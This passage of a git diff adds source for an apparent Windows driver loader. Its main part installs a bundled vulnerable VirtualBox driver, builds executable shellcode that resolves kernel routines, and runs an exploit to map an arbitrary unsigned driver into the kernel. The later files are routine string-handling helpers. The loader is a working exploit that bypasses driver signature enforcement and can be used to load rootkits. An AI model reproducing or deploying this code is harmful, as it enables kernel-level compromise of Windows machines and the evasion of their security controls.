|| (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; + + isz = FileHeader->OptionalHeader.SizeOfImage; + + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread + + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); + + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + + cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } + + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } + + return result; +} + +/* +* TDLStartVulnerableDriver +* +* Purpose: +* +* Load vulnerable virtualbox driver and return handle for it device. +* +*/ +HANDLE TDLStartVulnerableDriver( + VOID + ) +{ + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; + + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { + + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); + + break; + } + + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); + + break; + } + + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); + + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } + + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); + + break; + } + } + + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); + + if (bytesIO != DataSize) { + + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); + + break; + } + + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } + + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); + + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } + + //post cleanup + if (schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; +} + +/* +* TDLStopVulnerableDriver +* +* Purpose: +* +* Unload previously loaded vulnerable driver. If VirtualBox installed - restore original driver. +* +*/ +void TDLStopVulnerableDriver( + VOID + ) +{ + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; + + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); + + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); + + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + + + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { + + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); + + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); +} + +/* +* TDLProcessCommandLine +* +* Purpose: +* +* Extract target driver from command line and continue with it load. +* +*/ +UINT TDLProcessCommandLine( + LPWSTR lpCommandLine + ) +{ + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; + + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; +} + +/* +* TDLMain +* +* Purpose: +* +* Loader main. +* +*/ +void TDLMain() +{ + + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; + + __security_init_cookie(); + + do { + g_hInstance = GetModuleHandle(NULL); + + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } + + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } + + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); + + + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } + + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } + + _strcpy(text, TEXT("Ldr: Windows v")); + ultostr(osv.dwMajorVersion, _strend(text)); + _strcat(text, TEXT(".")); + ultostr(osv.dwMinorVersion, _strend(text)); + _strcat(text, TEXT(" build ")); + ultostr(osv.dwBuildNumber, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + + g_VBoxInstalled = TDLVBoxInstalled(); + if (g_VBoxInstalled) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Warning VirtualBox software installed, conficts possible"), + g_ConsoleOutput, TRUE); + } + + uResult = TDLProcessCommandLine(GetCommandLine()); + + } while (cond); + + InterlockedDecrement((PLONG)&g_lApplicationInstances); + ExitProcess(uResult); +} diff --git a/Source/Furutaka/minirtl/_strcat.c b/Source/Furutaka/minirtl/_strcat.c new file mode 100644 index 0000000..eb3c136 --- /dev/null +++ b/Source/Furutaka/minirtl/_strcat.c @@ -0,0 +1,37 @@ +#include "rtltypes.h" + +char *_strcat_a(char *dest, const char *src) +{ + if ( (dest==0) || (src==0) ) + return dest; + + while ( *dest!=0 ) + dest++; + + while ( *src!=0 ) { + *dest = *src; + dest++; + src++; + } + + *dest = 0; + return dest; +} + +wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) +{ + if ( (dest==0) || (src==0) ) + return dest; + + while ( *dest!=0 ) + dest++; + + while ( *src!=0 ) { + *dest = *src; + dest++; + src++; + } + + *dest = 0; + return dest; +} diff --git a/Source/Furutaka/minirtl/_strcmpi.c b/Source/Furutaka/minirtl/_strcmpi.c new file mode 100644 index 0000000..5f6656b --- /dev/null +++ b/Source/Furutaka/minirtl/_strcmpi.c @@ -0,0 +1,47 @@ +#include "rtltypes.h" + +int _strcmpi_a(const char *s1, const char *s2) +{ + char c1, c2; + + if ( s1==s2 ) + return 0; + + if ( s1==0 ) + return -1; + + if ( s2==0 ) + return 1; + + do { + c1 = locase_a(*s1); + c2 = locase_a(*s2); + s1++; + s2++; + } while ( (c1 != 0) && (c1 == c2) ); + + return (int)(c1 - c2); +} + +int _strcmpi_w(const wchar_t *s1, const wchar_t *s2) +{ + wchar_t c1, c2; + + if ( s1==s2 ) + return 0; + + if ( s1==0 ) + return -1; + + if ( s2==0 ) + return 1; + + do { + c1 = locase_w(*s1); + c2 = locase_w(*s2); + s1++; + s2++; + } while ( (c1 != 0) && (c1 == c2) ); + + return (int)(c1 - c2); +} diff --git a/Source/Furutaka/minirtl/_strcpy.c b/Source/Furutaka/minirtl/_strcpy.c new file mode 100644 index 0000000..bad5c90 --- /dev/null +++ b/Source/Furutaka/minirtl/_strcpy.c @@ -0,0 +1,43 @@ +#include "rtltypes.h" + +char *_strcpy_a(char *dest, const char *src) +{ + char *p; + + if ( (dest==0) || (src==0) ) + return dest; + + if (dest == src) + return dest; + + p = dest; + while ( *src!=0 ) { + *p = *src; + p++; + src++; + } + + *p = 0; + return dest; +} + +wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) +{ + wchar_t *p; + + if ((dest == 0) || (src == 0)) + return dest; + + if (dest == src) + return dest; + + p = dest; + while ( *src!=0 ) { + *p = *src; + p++; + src++; + } + + *p = 0; + return dest; +} diff --git a/Source/Furutaka/minirtl/_strend.c b/Source/Furutaka/minirtl/_strend.c new file mode 100644 index 0000000..a4d4b6a --- /dev/null +++ b/Source/Furutaka/minirtl/_strend.c @@ -0,0 +1,23 @@ +#include "rtltypes.h" + +char *_strend_a(const char *s) +{ + if ( s==0 ) + return 0; + + while ( *s!=0 ) + s++; + + return (char *)s; +} + +wchar_t *_strend_w(const wchar_t *s) +{ + if ( s==0 ) + return 0; + + while ( *s!=0 ) + s++; + + return (wchar_t *)s; +} diff --git a/Source/Furutaka/minirtl/_strlen.c b/Source/Furutaka/minirtl/_strlen.c new file mode 100644 index 0000000..1feda9e --- /dev/null +++ b/Source/Furutaka/minirtl/_strlen.c @@ -0,0 +1,27 @@ +#include "rtltypes.h" + +size_t _strlen_a(const char *s) +{ + char *s0 = (char *)s; + + if ( s==0 ) + return 0; + + while ( *s!=0 ) + s++; + + return (s-s0); +} + +size_t _strlen_w(const wchar_t *s) +{ + wchar_t *s0 = (wchar_t *)s; + + if ( s==0 ) + return 0; + + while ( *s!=0 ) + s++; + + return (s-s0); +} diff --git a/Source/Furutaka/minirtl/_strncmpi.c b/Source/Furutaka/minirtl/_strncmpi.c new file mode 100644 index 0000000..ddbe8b8 --- /dev/null +++ b/Source/Furutaka/minirtl/_strncmpi.c @@ -0,0 +1,55 @@ +#include "rtltypes.h" + +int _strncmpi_a(const char *s1, const char *s2, size_t cchars) +{ + char c1, c2; + + if ( s1==s2 ) + return 0; + + if ( s1==0 ) + return -1; + + if ( s2==0 ) + return 1; + + if ( cchars==0 ) + return 0; + + do { + c1 = locase_a(*s1); + c2 = locase_a(*s2); + s1++; + s2++; + cchars--; + } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); + + return (int)(c1 - c2); +} + +int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) +{ + wchar_t c1, c2; + + if ( s1==s2 ) + return 0; + + if ( s1==0 ) + return -1; + + if ( s2==0 ) + return 1; + + if ( cchars==0 ) + return 0; + + do { + c1 = locase_w(*s1); + c2 = locase_w(*s2); + s1++; + s2++; + cchars--; + } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); + + return (int)(c1 - c2); +} diff --git a/Source/Furutaka/minirtl/cmdline.c b/Source/Furutaka/minirtl/cmdline.c new file mode 100644 index 0000000..1a3aecb --- /dev/null +++ b/Source/Furutaka/minirtl/cmdline.c @@ -0,0 +1,180 @@ +#include + +BOOL GetCommandLineParamW( + IN LPCWSTR CmdLine, + IN ULONG ParamIndex, + OUT LPWSTR Buffer, + IN ULONG BufferSize, + OUT PULONG ParamLen + ) +{ + ULONG c, plen = 0; + TCHAR divider; + + if (ParamLen != NULL) + *ParamLen = 0; + + if (CmdLine == NULL) { + if ((Buffer != NULL) && (BufferSize > 0)) + *Buffer = 0; + return FALSE; + } + + for (c = 0; c <= ParamIndex; c++) { + plen = 0; + + while (*CmdLine == ' ') + CmdLine++; + + switch (*CmdLine) { + case 0: + goto zero_term_exit; + + case '"': + CmdLine++; + divider = '"'; + break; + + default: + divider = ' '; + } + + while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { + plen++; + if (c == ParamIndex) + if ((plen < BufferSize) && (Buffer != NULL)) { + *Buffer = *CmdLine; + Buffer++; + } + CmdLine++; + } + + if (*CmdLine != 0) + CmdLine++; + } + +zero_term_exit: + + if ((Buffer != NULL) && (BufferSize > 0)) + *Buffer = 0; + + if (ParamLen != NULL) + *ParamLen = plen; + + if (plen < BufferSize) + return TRUE; + else + return FALSE; +} + +BOOL GetCommandLineParamA( + IN LPCSTR CmdLine, + IN ULONG ParamIndex, + OUT LPSTR Buffer, + IN ULONG BufferSize, + OUT PULONG ParamLen + ) +{ + ULONG c, plen = 0; + TCHAR divider; + + if (CmdLine == NULL) + return FALSE; + + if (ParamLen != NULL) + *ParamLen = 0; + + for (c = 0; c <= ParamIndex; c++) { + plen = 0; + + while (*CmdLine == ' ') + CmdLine++; + + switch (*CmdLine) { + case 0: + goto zero_term_exit; + + case '"': + CmdLine++; + divider = '"'; + break; + + default: + divider = ' '; + } + + while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { + plen++; + if (c == ParamIndex) + if ((plen < BufferSize) && (Buffer != NULL)) { + *Buffer = *CmdLine; + Buffer++; + } + CmdLine++; + } + + if (*CmdLine != 0) + CmdLine++; + } + +zero_term_exit: + + if ((Buffer != NULL) && (BufferSize > 0)) + *Buffer = 0; + + if (ParamLen != NULL) + *ParamLen = plen; + + if (plen < BufferSize) + return TRUE; + else + return FALSE; +} + +char *ExtractFilePathA(const char *FileName, char *FilePath) +{ + char *p = (char *)FileName, *p0 = (char *)FileName; + + if ((FileName == 0) || (FilePath == 0)) + return 0; + + while (*FileName != 0) { + if (*FileName == '\\') + p = (char *)FileName + 1; + FileName++; + } + + while (p0 < p) { + *FilePath = *p0; + FilePath++; + p0++; + } + + *FilePath = 0; + + return FilePath; +} + +wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath) +{ + wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName; + + if ((FileName == 0) || (FilePath == 0)) + return 0; + + while (*FileName != 0) { + if (*FileName == '\\') + p = (wchar_t *)FileName + 1; + FileName++; + } + + while (p0 < p) { + *FilePath = *p0; + FilePath++; + p0++; + } + + *FilePath = 0; + + return FilePath; +} diff --git a/Source/Furutaka/minirtl/cmdline.h b/Source/Furutaka/minirtl/cmdline.h new file mode 100644 index 0000000..310a4a5 --- /dev/null +++ b/Source/Furutaka/minirtl/cmdline.h @@ -0,0 +1,35 @@ +#ifndef _CMDLINEH_ +#define _CMDLINEH_ + +BOOL GetCommandLineParamW( + IN LPCWSTR CmdLine, + IN ULONG ParamIndex, + OUT LPWSTR Buffer, + IN ULONG BufferSize, + OUT PULONG ParamLen + ); + +BOOL GetCommandLineParamA( + IN LPCSTR CmdLine, + IN ULONG ParamIndex, + OUT LPSTR Buffer, + IN ULONG BufferSize, + OUT PULONG ParamLen + ); + +char *ExtractFilePathA(const char *FileName, char *FilePath); +wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); + +#ifdef UNICODE + +#define ExtractFilePath ExtractFilePathW +#define GetCommandLineParam GetCommandLineParamW + +#else // ANSI + +#define ExtractFilePath ExtractFilePathA +#define GetCommandLineParam GetCommandLineParamA + +#endif + +#endif /* _CMDLINEH_ */ diff --git a/Source/Furutaka/minirtl/minirtl.h b/Source/Furutaka/minirtl/minirtl.h new file mode 100644 index 0000000..17cf519 --- /dev/null +++ b/Source/Furutaka/minirtl/minirtl.h @@ -0,0 +1,155 @@ +/* +Module name: + minirtl.h + +Description: + header for string handling and conversion routines + +Date: + 1 Mar 2015 +*/ + +#ifndef _MINIRTL_ +#define _MINIRTL_ + +// string copy/concat/length + +char *_strend_a(const char *s); +wchar_t *_strend_w(const wchar_t *s); + +char *_strcpy_a(char *dest, const char *src); +wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src); + +char *_strcat_a(char *dest, const char *src); +wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src); + +char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc); +wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc); + +size_t _strlen_a(const char *s); +size_t _strlen_w(const wchar_t *s); + +// comparing + +int _strcmp_a(const char *s1, const char *s2); +int _strcmp_w(const wchar_t *s1, const wchar_t *s2); + +int _strncmp_a(const char *s1, const char *s2, size_t cchars); +int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars); + +int _strcmpi_a(const char *s1, const char *s2); +int _strcmpi_w(const wchar_t *s1, const wchar_t *s2); + +int _strncmpi_a(const char *s1, const char *s2, size_t cchars); +int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars); + +char *_strstr_a(const char *s, const char *sub_s); +wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s); + +char *_strstri_a(const char *s, const char *sub_s); +wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s); + +// conversion of integer types to string, returning string length + +size_t ultostr_a(unsigned long x, char *s); +size_t ultostr_w(unsigned long x, wchar_t *s); + +size_t ultohex_a(unsigned long x, char *s); +size_t ultohex_w(unsigned long x, wchar_t *s); + +size_t itostr_a(int x, char *s); +size_t itostr_w(int x, wchar_t *s); + +size_t i64tostr_a(signed long long x, char *s); +size_t i64tostr_w(signed long long x, wchar_t *s); + +size_t u64tostr_a(unsigned long long x, char *s); +size_t u64tostr_w(unsigned long long x, wchar_t *s); + +size_t u64tohex_a(unsigned long long x, char *s); +size_t u64tohex_w(unsigned long long x, wchar_t *s); + +// string to integers conversion + +unsigned long strtoul_a(char *s); +unsigned long strtoul_w(wchar_t *s); + +unsigned long long strtou64_a(char *s); +unsigned long long strtou64_w(wchar_t *s); + +unsigned long hextoul_a(char *s); +unsigned long hextoul_w(wchar_t *s); + +int strtoi_a(char *s); +int strtoi_w(wchar_t *s); + +signed long long strtoi64_a(char *s); +signed long long strtoi64_w(wchar_t *s); + +unsigned long long hextou64_a(char *s); +unsigned long long hextou64_w(wchar_t *s); + +/* =================================== */ + +#ifdef UNICODE + +#define _strend _strend_w +#define _strcpy _strcpy_w +#define _strcat _strcat_w +#define _strlen _strlen_w +#define _strncpy _strncpy_w + +#define _strcmp _strcmp_w +#define _strncmp _strncmp_w +#define _strcmpi _strcmpi_w +#define _strncmpi _strncmpi_w +#define _strstr _strstr_w +#define _strstri _strstri_w + +#define ultostr ultostr_w +#define ultohex ultohex_w +#define itostr itostr_w +#define i64tostr i64tostr_w +#define u64tostr u64tostr_w +#define u64tohex u64tohex_w + +#define strtoul strtoul_w +#define hextoul hextoul_w +#define strtoi strtoi_w +#define strtoi64 strtoi64_w +#define strtou64 strtou64_w +#define hextou64 hextou64_w + +#else // ANSI + +#define _strend _strend_a +#define _strcpy _strcpy_a +#define _strcat _strcat_a +#define _strlen _strlen_a +#define _strncpy _strncpy_a +#define _strcmp _strcmp_a + +#define _strcmp _strcmp_a +#define _strncmp _strncmp_a +#define _strcmpi _strcmpi_a +#define _strncmpi _strncmpi_a +#define _strstr _strstr_a +#define _strstri _strstri_a + +#define ultostr ultostr_a +#define ultohex ultohex_a +#define itostr itostr_a +#define i64tostr i64tostr_a +#define u64tostr u64tostr_a +#define u64tohex u64tohex_a + +#define strtoul strtoul_a +#define hextoul hextoul_a +#define strtoi strtoi_a +#define strtoi64 strtoi64_a +#define strtou64 strtou64_a +#define hextou64 hextou64_a + +#endif + +#endif /* _MINIRTL_ */ diff --git a/Source/Furutaka/minirtl/rtltypes.h b/Source/Furutaka/minirtl/rtltypes.h new file mode 100644 index 0000000..fbb8b2d --- /dev/null +++ b/Source/Furutaka/minirtl/rtltypes.h @@ -0,0 +1,43 @@ +#ifndef _WCHAR_T_DEFINED +typedef unsigned short wchar_t; +#define _WCHAR_T_DEFINED +#endif /* _WCHAR_T_DEFINED */ + +#ifndef _SIZE_T_DEFINED +#ifdef _WIN64 +typedef unsigned __int64 size_t; +#else /* _WIN64 */ +typedef __w64 unsigned int size_t; +#endif /* _WIN64 */ +#define _SIZE_T_DEFINED +#endif /* _SIZE_T_DEFINED */ + +__forceinline char locase_a(char c) +{ + if ((c >= 'A') && (c <= 'Z')) + return c + 0x20; + else + return c; +} + +__forceinline wchar_t locase_w(wchar_t c) +{ + if ((c >= 'A') && (c <= 'Z')) + return c + 0x20; + else + return c; +} + +__forceinline char byteabs(char x) { + if (x < 0) + return -x; + return x; +} + +__forceinline int _isdigit_a(char x) { + return ((x >= '0') && (x <= '9')); +} + +__forceinline int _isdigit_w(wchar_t x) { + return ((x >= L'0') && (x <= L'9')); +} diff --git a/Source/Furutaka/minirtl/u64tohex.c b/Source/Furutaka/minirtl/u64tohex.c new file mode 100644 index 0000000..1e7af7f --- /dev/null +++ b/Source/Furutaka/minirtl/u64tohex.c @@ -0,0 +1,49 @@ +#include "rtltypes.h" + +size_t u64tohex_a(unsigned long long x, char *s) +{ + char p; + size_t c; + + if (s==0) + return 16; + + for (c=0; c<16; c++) { + p = (char)(x & 0xf); + x >>= 4; + + if (p<10) + p += '0'; + else + p = 'A' + (p-10); + + s[15-c] = p; + } + + s[16] = 0; + return 16; +} + +size_t u64tohex_w(unsigned long long x, wchar_t *s) +{ + wchar_t p; + size_t c; + + if (s==0) + return 16; + + for (c = 0; c<16; c++) { + p = (wchar_t)(x & 0xf); + x >>= 4; + + if (p<10) + p += L'0'; + else + p = L'A' + (p-10); + + s[15-c] = p; + } + + s[16] = 0; + return 16; +} diff --git a/Source/Furutaka/minirtl/u64tostr.c b/Source/Furutaka/minirtl/u64tostr.c new file mode 100644 index 0000000..24c4dba --- /dev/null +++ b/Source/Furutaka/minirtl/u64tostr.c @@ -0,0 +1,45 @@ +#include "rtltypes.h" + +size_t u64tostr_a(unsigned long long x, char *s) +{ + unsigned long long t = x; + size_t i, r=1; + + while ( t >= 10 ) { + t /= 10; + r++; + } + + if (s == 0) + return r; + + for (i = r; i != 0; i--) { + s[i-1] = (char)(x % 10) + '0'; + x /= 10; + } + + s[r] = (char)0; + return r; +} + +size_t u64tostr_w(unsigned long long x, wchar_t *s) +{ + unsigned long long t = x; + size_t i, r=1; + + while ( t >= 10 ) { + t /= 10; + r++; + } + + if (s == 0) + return r; + + for (i = r; i != 0; i--) { + s[i-1] = (wchar_t)(x % 10) + L'0'; + x /= 10; + } + + s[r] = (wchar_t)0; + return r; +} diff --git a/Source/Furutaka/minirtl/ultohex.c b/Source/Furutaka/minirtl/ultohex.c new file mode 100644 index 0000000..2529c9c --- /dev/null +++ b/Source/Furutaka/minirtl/ultohex.c @@ -0,0 +1,49 @@ +#include "rtltypes.h" + +size_t ultohex_a(unsigned long x, char *s) +{ + char p; + size_t c; + + if (s==0) + return 8; + + for (c=0; c<8; c++) { + p = (char)(x & 0xf); + x >>= 4; + + if (p<10) + p += '0'; + else + p = 'A' + (p-10); + + s[7-c] = p; + } + + s[8] = 0; + return 8; +} + +size_t ultohex_w(unsigned long x, wchar_t *s) +{ + wchar_t p; + size_t c; + + if (s==0) + return 8; + + for (c=0; c<8; c++) { + p = (wchar_t)(x & 0xf); + x >>= 4; + + if (p<10) + p += L'0'; + else + p = L'A' + (p-10); + + s[7-c] = p; + } + + s[8] = 0; + return 8; +} diff --git a/Source/Furutaka/minirtl/ultostr.c b/Source/Furutaka/minirtl/ultostr.c new file mode 100644 index 0000000..457ccbb --- /dev/null +++ 